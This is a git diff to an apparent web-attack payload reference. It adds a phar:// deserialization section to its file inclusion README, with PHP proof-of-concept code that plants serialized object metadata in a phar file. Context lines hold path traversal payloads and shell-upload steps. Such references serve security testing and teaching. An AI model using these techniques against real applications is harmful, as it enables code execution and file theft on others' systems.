diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index 1c9387a..8a51ec6 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -12,6 +12,7 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e * [Wrapper data://](#wrapper-data) * [Wrapper expect://](#wrapper-expect) * [Wrapper input://](#wrapper-input) + * [Wrapper phar://](#wrapper-phar) * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) * [LFI to RCE via upload](#lfi-to-rce-via-upload) @@ -185,6 +186,39 @@ http://example.com/index.php?page=php://input POST DATA: ``` +### Wrapper phar:// + +Create a phar file with a serialized object in its meta-data. + +```php +// create new Phar +$phar = new Phar('test.phar'); +$phar->startBuffering(); +$phar->addFromString('test.txt', 'text'); +$phar->setStub(''); + +// add object of any class as meta data +class AnyClass {} +$object = new AnyClass; +$object->data = 'rips'; +$phar->setMetadata($object); +$phar->stopBuffering(); +``` + +If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked + +```php +class AnyClass { + function __destruct() { + echo $this->data; + } +} +// output: rips +include('phar://test.phar'); +``` + +NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. + ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) @@ -266,4 +300,8 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) -* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) \ No newline at end of file +* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) +* [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) +* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379) +* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) +* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) \ No newline at end of file diff --git a/PHP serialization/README.md b/PHP serialization/README.md index 975492e..e897318 100644 --- a/PHP serialization/README.md +++ b/PHP serialization/README.md @@ -2,6 +2,8 @@ PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. +Also you should check the `Wrapper Phar://` in [File Inclusion - Path Traversal](github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar) which use a PHP object injection. + ## Exploit with the __wakeup in the unserialize function Vulnerable code: